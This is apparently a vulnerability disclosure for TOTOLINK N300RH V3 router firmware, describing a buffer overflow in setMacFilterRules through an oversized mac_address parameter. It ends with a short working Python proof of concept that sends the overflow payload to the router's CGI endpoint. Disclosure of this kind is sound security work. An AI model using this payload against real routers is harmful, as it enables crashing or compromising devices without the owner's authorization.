TOTOLINK-N300RH-setMacFilterRules

Overview

Manufacturer's website information：https://www.totolink.net/
Firmware download address ：https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/155/ids/36.html

Affected version

N300RH V3_Firmware V3.2.4-B20220812

Vulnerability details

In the N300RH V3_Firmware V3.2.4-B20220812 firmware has a buffer overflow vulnerability in the setMacFilterRules function. The v11 variable receives the mac_address parameter from a POST request. However, since the user can control the input of mac_address, the statement sprintf can cause a buffer overflow vulnerability.

POC

import requests
url = "<http://127.0.0.1/cgi-bin/cstecgi.cgi>"
cookie = {"Cookie":"SESSION_ID=2:1721039211:2"}
data = {"addEffect":"0","mac_address":"a"*0x1000,"topicurl":"setMacFilterRules"}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)